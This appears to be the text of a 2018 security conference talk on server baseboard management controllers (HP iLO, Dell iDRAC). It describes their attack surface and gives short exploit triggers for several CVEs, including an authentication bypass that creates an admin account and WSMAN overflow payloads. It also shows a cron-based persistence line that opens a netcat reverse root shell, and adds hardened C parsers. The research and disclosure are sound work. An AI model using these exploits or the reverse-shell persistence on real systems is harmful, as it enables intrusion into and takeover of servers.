The unbearable lightness of BMC
Blackhat 2018

Welcome to a world of infinite hardware

WHO ARE WE?
Nico Waisman, VP LATAM, @nicowaisman
Matias Soler, Sr Security Researcher, @gnuler

BMC
Independent from the OS
Remote control
Monitoring: temperature, voltage, fans

BMC
Full network stack
KVM
Serial console
Power management

(OR A BACKDOOR)

While your server is plugged in, your BMC is on

iDRAC, iLO, IMM

HP ILO 2: NEC V850, ThreadX

HP ILO 4: ARM, GHS INTEGRITY

IMM / iDRAC: SuperH, Linux

And remote... PRE-AUTH

The excitement of auditing BMC

ATTACK SURFACE

ATTACK SURFACE
SMASH: TCP/22
SNMP: UDP/161,162
HTTPS: TCP/80,443
IPMI: UDP/623
OTHER: standalone WSMAN, KVM, VNC

SMASH
Command line standardized by the DMTF
Runs over SSH
Most of the attack surface is post-auth. However, post-auth access is still useful to triage/debug other attacks

SMASH
TEXTCONS enables a remote console! :D

SMASH
https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/

SNMP

```shell
$ snmpwalk -v1 -c public -m "./immalert.mib" 192.168.1.129
```

IPMI
BMCs have an infamous protocol called IPMI (UDP/623)
Used to remotely manage the BMC and access most of its capabilities, including the serial console over UDP

In 2013 ITWorld magazine called IPMI the most dangerous protocol in the world...

IPMI
Previous work
(1) Authentication bypass on Cipher Zero
(2) RAKP authentication debacle
(3) Predictable session ID
(1,2) Dan Farmer IPMI research
(3) "A Case of Weak Session-ID", https://labs.mwrinfosecurity.com/blog/cve-2014-8272/

IPMI
IPMI Zero Length Pool Overflow (HP ILO 2, CVE-2017-8979)

```c
length = IPMI_Packet->Message_Length - 6;
mem = pool_block_allocate();
memcpy(mem, source, length);
```

IPMI
Easy exploit to trigger on ILO2 < 2.32

```python
buf = "0600ff07000000000000000000092018c88100388e04b5"
mess = [int(buf[a:a+2], 16) for a in range(0, len(buf), 2)]
p = 13
nm = mess[:p] + [0] + mess[p+1:]
s = SendPacket(nm, sys.argv[1], IPMI_PORT)
```

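To make the zero-length bug concrete from the defender's side, here is an added example (not code from the talk, from HP, or from the ILO firmware): a small C parser for the RMCP/IPMI 1.5 session header that contrasts the slide's unchecked `Message_Length - 6` with a bounds-checked version, both run over the packet bytes from the slide. The header offsets, the 6-byte IPMI message header and the function names are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout of the sample packet (RMCP + IPMI 1.5 session header, auth type NONE):
 *   RMCP header            4 bytes  (version, reserved, sequence, class)
 *   auth type              1 byte   (0x00 = none, so no 16-byte auth code follows)
 *   session sequence       4 bytes
 *   session id             4 bytes
 *   IPMI message length    1 byte   <- the field the slide's PoC zeroes (offset 13)
 *   IPMI message           msg_len bytes: 6-byte header, data, checksum */
#define RMCP_HDR_LEN     4
#define SESSION_HDR_LEN  10
#define MSG_LEN_OFFSET   (RMCP_HDR_LEN + SESSION_HDR_LEN - 1)   /* 13 */
#define IPMI_MSG_HDR_LEN 6   /* the "- 6" from the slide: rsAddr, netFn/LUN, cksum, rqAddr, rqSeq, cmd */

/* Constructed sample: the Get Channel Authentication Capabilities request from the slide. */
static const uint8_t SAMPLE_PKT[] = {
    0x06, 0x00, 0xff, 0x07,             /* RMCP: version 6, reserved, seq 0xff, class IPMI */
    0x00,                               /* auth type: none */
    0x00, 0x00, 0x00, 0x00,             /* session sequence number */
    0x00, 0x00, 0x00, 0x00,             /* session id */
    0x09,                               /* IPMI message length = 9 */
    0x20, 0x18, 0xc8, 0x81, 0x00, 0x38, /* rsAddr, netFn/LUN, cksum, rqAddr, rqSeq, cmd 0x38 */
    0x8e, 0x04, 0xb5                    /* data (channel, privilege level), checksum */
};

/* The pattern from the slide: the length is used without checking that it even covers
 * the message header. msg_len is promoted to int, 0 - 6 is -6, and storing that in an
 * unsigned size yields 0xFFFFFFFA, which is what memcpy would then be asked to copy. */
uint32_t vulnerable_payload_len(uint8_t msg_len) {
    uint32_t length = msg_len - IPMI_MSG_HDR_LEN;
    return length;
}

/* Hardened version: reject lengths that would underflow and lengths that claim more
 * bytes than the datagram actually carries. Returns 0 and the payload length on
 * success, -1 on any malformed input. */
int safe_payload_len(const uint8_t *pkt, size_t pkt_len, size_t *out_len) {
    if (pkt == NULL || out_len == NULL) return -1;
    if (pkt_len < RMCP_HDR_LEN + SESSION_HDR_LEN) return -1;  /* truncated session header */
    if (pkt[RMCP_HDR_LEN] != 0x00) return -1;                 /* only auth type NONE is modelled here */
    size_t msg_len = pkt[MSG_LEN_OFFSET];
    size_t available = pkt_len - (RMCP_HDR_LEN + SESSION_HDR_LEN);
    if (msg_len < IPMI_MSG_HDR_LEN) return -1;                /* would underflow: the zero-length case */
    if (msg_len > available) return -1;                       /* would read past the received bytes */
    *out_len = msg_len - IPMI_MSG_HDR_LEN;
    return 0;
}

/* Run the hardened parser over the first pkt_len bytes of the sample (pkt_len smaller
 * than the real size models a datagram truncated on the wire). */
long sample_payload_len(size_t pkt_len) {
    size_t n = 0;
    if (pkt_len > sizeof SAMPLE_PKT) pkt_len = sizeof SAMPLE_PKT;
    return safe_payload_len(SAMPLE_PKT, pkt_len, &n) == 0 ? (long)n : -1;
}

/* Same sample with the length byte zeroed, the way the slide's PoC does it. */
long zeroed_sample_payload_len(void) {
    uint8_t pkt[sizeof SAMPLE_PKT];
    size_t n = 0;
    memcpy(pkt, SAMPLE_PKT, sizeof pkt);
    pkt[MSG_LEN_OFFSET] = 0;
    return safe_payload_len(pkt, sizeof pkt, &n) == 0 ? (long)n : -1;
}

int main(void) {
    printf("vulnerable, length 9 : %u\n", (unsigned)vulnerable_payload_len(9));       /* 3 */
    printf("vulnerable, length 0 : 0x%08x\n", (unsigned)vulnerable_payload_len(0));   /* 0xfffffffa */
    printf("hardened, as received: %ld\n", sample_payload_len(sizeof SAMPLE_PKT));    /* 3 */
    printf("hardened, zeroed     : %ld\n", zeroed_sample_payload_len());              /* -1 */
    return 0;
}
```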
HTTPS
Interesting target
Preferred by sysadmins & firewalls, open by default
Most of them use a popular embedded web server: Appweb
However, some vendors implement their own server

HTTPS
Discovering BMCs
On HP ILO: URL/xmldata?item=all
On Dell iDRAC: URL/cgi-bin/discover

HTTPS
HP ILO 4 < 2.53, CVE-2017-12542: sscanf("%*S %s")
Fabien Perigaud, Alexandre Gazet, Joffrey Czarny from Synacktiv/Airbus

HTTPS
Easy exploit to trigger on ILO4 < 2.53

```python
exploit_trigger = {'Connection': 'A' * 29}
accounts_url = 'https://%s/rest/v1/AccountService/Accounts'
Oem = {'Hp': {'LoginName': username,
              'Privileges': {'LoginPriv': True, 'RemoteConsolePriv': True,
                             'UserConfigPriv': True, 'VirtualMediaPriv': True,
                             'iLOConfigPriv': True, 'VirtualPowerAndResetPriv': True}}}
body = {'UserName': username, 'Password': password, 'Oem': Oem}
response = requests.post(url, json=body, headers=exploit_trigger, verify=False)
```

HTTPS
Environment Variable Injection leads to RCE (iDRAC 8, CVE-2018-1207)

```shell
$ curl 'https://x.x.x.x/cgi-bin/login?LD_DEBUG=files'
HTTP/1.1 503 Service Unavailable
Keep-Alive: timeout=60, max=199
[...]
24986: file=/usr/lib/libfipsint.so.0.0.0 [0]; needed by /usr/local/cgi-bin/login [0]
24986: file=/usr/lib/libfipsint.so.0.0.0 [0]; generating link map
24986: dynamic: 0x295689e8 base: 0x29558000 size: 0x00010b24
24986: entry: 0x29558680 phdr: 0x29558034 phnum: 4
```

We know what you are thinking: /proc/self/fd/0

HTTPS
Environment Variable Injection leads to RCE
The putfile CGI allows unauthenticated users to store arbitrary content in a file
Limited to 128 kB
File: /tmp/sshpkauthupload.tmp

DEMO TIME!

HTTPS
Opens the attack surface to another layer of attacks:
WS-MAN
Redfish
RIBCL

HTTPS
Redfish is a RESTful API created by the DMTF after the IPMI fiasco
Uses JSON to communicate
Endpoints available at /redfish/v1/

HTTPS
RIBCL is an HP ILO solution for configuration and management using XML over HTTP
The /RIBCL endpoint is accessible pre-authentication
RIBCL itself handles the authentication through the XML protocol

WSMAN
Web Services Management
Microsoft supports it natively (WinRM)
Similar syntax to XML but with certain variations (based on SOAP)
Used extensively due to PowerShell support

WSMAN
Generally accessible through an HTTPS endpoint, /wsman
But could be found standalone on port TCP/5985
Auth: Basic Auth, Digest Auth, Kerberos

WSMAN
Preauth Stack-Based Buffer Overflow in WSMAN XML Tag Name Parsing (HP ILO 2, CVE-2017-8979)

```asm
ROM:001108B4 movhi 0x1F, r0, r7
ROM:001108B8 movea 0xAE0, r7, r7      // "%[^:]:%s"
ROM:001108BC addi 0x80, sp, r8
ROM:001108C0 addi 0xC0, sp, r9
ROM:001108C4 jarl sscanf, lp          // sscanf(arg2, "%[^:]:%s", sp[0x80], sp[0xC0])
ROM:001108C8 cmp 2, r10
ROM:001108CA bz loc_1108E
```

WSMAN
Easy exploit to trigger on ILO2 < 2.32

```python
import requests
headers = {'Content-Type': 'application/soap+xml;charset=UTF-8'}
payload = "<x:" + "B" * 0x300 + ">\n</x>"
r = requests.post('https://x.x.x.x/wsman', data=payload, verify=False, headers=headers)
print(r.text)
```

WSMAN
Preauth Stack-Based Buffer Overflow in WSMAN XML namespace parsing (HP ILO 2, CVE-2017-8979)

```asm
ROM:00110574 addi 0, sp, r27
ROM:00110578 movhi 0x1F, r0, r7
ROM:0011057C movea 0xAAC, r7, r7      // "xmlns:%[^="
ROM:00110580 mov r27, r8              // r8 = r27 = sp[0] = dst buffer
ROM:00110582 jarl sscanf, lp          // r6 buffer, r7 fmtstring, etc.
ROM:00110586 cmp r0, r10
ROM:00110588 bnz loc_11058E
```

WSMAN
Easy exploit to trigger on ILO2 < 2.32

```python
import requests
headers = {'Content-Type': 'application/soap+xml;charset=UTF-8'}
payload = "<x xmlns:" + "B" * 0x24C + "=\"\">\n</x>"
r = requests.post('https://x.x.x.x/wsman', data=payload, verify=False, headers=headers)
print(r.text)
```

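As an added example (not the talk's, HP's or the ILO firmware's code), this is the hardened form of the sscanf call behind both WSMAN overflows above: width-limited conversions plus an end-of-input check, shown next to the unbounded "%[^:]:%s" pattern from the disassembly. The same fix applies to the "xmlns:%[^=" case. The 63-byte field limit, the function names and the constructed tags are assumptions for the illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define QNAME_MAX 63           /* longest prefix or local name accepted; buffers hold QNAME_MAX + 1 */
#define STR_(x) #x
#define STR(x) STR_(x)         /* turns QNAME_MAX into the "63" width inside the format string */

/* The pattern reconstructed from the slide's disassembly: neither %[^:] nor %s carries a
 * width, so the tag name is copied into fixed stack buffers (sp[0x80] and sp[0xC0], only
 * 0x40 bytes apart) for as long as the input runs. Kept here for contrast only; it must
 * never be given untrusted input. */
int vulnerable_split_qname(const char *tag, char *prefix, char *local) {
    return sscanf(tag, "%[^:]:%s", prefix, local) == 2 ? 0 : -1;
}

/* Hardened version: width-limited conversions, and %n to confirm the whole tag was
 * consumed, so an over-long prefix or local name is rejected rather than silently
 * truncated (a truncated field would otherwise look like a successful parse). */
int safe_split_qname(const char *tag, char prefix[QNAME_MAX + 1], char local[QNAME_MAX + 1]) {
    int consumed = 0;
    if (tag == NULL || prefix == NULL || local == NULL) return -1;
    if (strlen(tag) > 2 * QNAME_MAX + 1) return -1;   /* cheap reject before scanning at all */
    if (sscanf(tag, "%" STR(QNAME_MAX) "[^:]:%" STR(QNAME_MAX) "s%n",
               prefix, local, &consumed) != 2) return -1;
    if (tag[consumed] != '\0') return -1;             /* a field hit its width limit, or trailing junk */
    return 0;
}

/* Helper: build a constructed tag of plen 'B' prefix bytes, ':', and llen 'C' local-name
 * bytes (the shape of the slide's "<x:" + "B" * 0x300 payload) and run the hardened
 * parser over it. Returns 0 when accepted, -1 when rejected. */
int check_tag_lengths(size_t plen, size_t llen) {
    char prefix[QNAME_MAX + 1], local[QNAME_MAX + 1];
    char *tag = malloc(plen + llen + 2);
    if (tag == NULL) return -1;
    memset(tag, 'B', plen);
    tag[plen] = ':';
    memset(tag + plen + 1, 'C', llen);
    tag[plen + 1 + llen] = '\0';
    int rc = safe_split_qname(tag, prefix, local);
    free(tag);
    return rc;
}

int main(void) {
    char prefix[QNAME_MAX + 1], local[QNAME_MAX + 1];
    if (safe_split_qname("wsa:Action", prefix, local) == 0)
        printf("prefix=%s local=%s\n", prefix, local);              /* prefix=wsa local=Action */
    printf("63:63 -> %d, 64:1 -> %d, 0x300:1 -> %d\n",
           check_tag_lengths(63, 63), check_tag_lengths(64, 1),
           check_tag_lengths(0x300, 1));                             /* 0, -1, -1 */
    return 0;
}
```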
MULTI-DIMENSIONAL MOVEMENT
Or how to move around the DMZ with impunity

#1 Hack the BMC
#2 Hack the server
BMC -> Server
Serial console
Mount a remote DVD
KVM (VNC, custom protocol, etc.)
DMA

DEMO TIME!

#1 Hack the Server
#2 Hack the BMC
Gain access to the management network from the internet

Server -> BMC
On some BMCs, OS tools are unauthenticated
Flash the firmware
Enable an emulated network, compromise it using one of our bugs
Allow you to create users on the BMC

DEMO TIME!

DEMO TIME!

PERSISTENCE
Like the 90's kids

BMC
Flashing the firmware is easy; however, it's signed.
11 hour 12 WEEKS

Hey '90s kid! You are old

List and check all the

```shell
/dev/mmcblk0p14 on /flash/data2 type ext2 (rw,noatime,errors=continue)
/dev/mmcblk0p13 on /mnt/cores type ext3 (rw,noatime,errors=continue,user_xattr,barrier=1,data=writeback)
/dev/mmcblk0p12 on /mmc1 type ext3 (rw,noatime,errors=continue,user_xattr,barrier=1,data=ordered)
/dev/mmcblk0p9 on /flash/pd9 type squashfs (ro,noatime)
/dev/mmcblk0p11 on /flash/data0 type ext3 (rw,noatime,errors=continue,barrier=1,data=ordered)
/dev/mmcblk0p15 on /mmc2 type ext3 (rw,noatime,errors=continue,barrier=1,data=ordered)
tmpfs on /var/volatile type tmpfs (rw,relatime)
mtd:lcl on /flash/data1 type jffs2 (rw,noatime)
/dev/mmcblk0p9 on /flash/pd0 type squashfs (ro,noatime)
```

No shame on persisting through cron, right? Right!?

```shell
$ cd /var/spool/cron
$ ls -lha
drwxr-xr-x 2 root root 31 Jul 27 2017 .
drwxr-xr-x 3 root root 27 Jul 27 2017 ..
lrwxrwxrwx 1 root root 21 Jul 27 2017 crontabs -> /flash/data0/crontabs
```

Setting up a cron file

```shell
$ ls -lha
drwxr-xr-x 2 root root 1.0K Feb 22 19:11 .
drwxr-xr-x 19 root root 1.0K Dec 31 1999 ..
-rwxrwxrwx 1 root root 48 Feb 21 19:54 root
$ cat root
* * * * * /bin/nc 192.168.1.136 4040 -e /bin/sh
```

Getting a connect back!

```shell
user@ilohop:~$ nc -v -l 4040
Listening on [0.0.0.0] (family 0, port 4040)
Connection from [192.168.1.135] port 4040 [tcp/*] accepted (family 2, sport 59455)
$ id
uid=0(root) gid=0(root) groups=0(root)
```

DEMO TIME!

TODO
A bunch of proprietary protocols to be analyzed
Write exploits for the HP ILO 2
Analyze tools used to remotely manage BMCs
More research on DMA
LOMs and NC-SI

CONCLUSION
Questions?
SHOUT OUT TO OUR AMAZING TEAM!
Mr R., Oren, Ivan, Juan, Emi, Leff, Bas and Danny
@nicowaisman @gnuler
(We are hiring)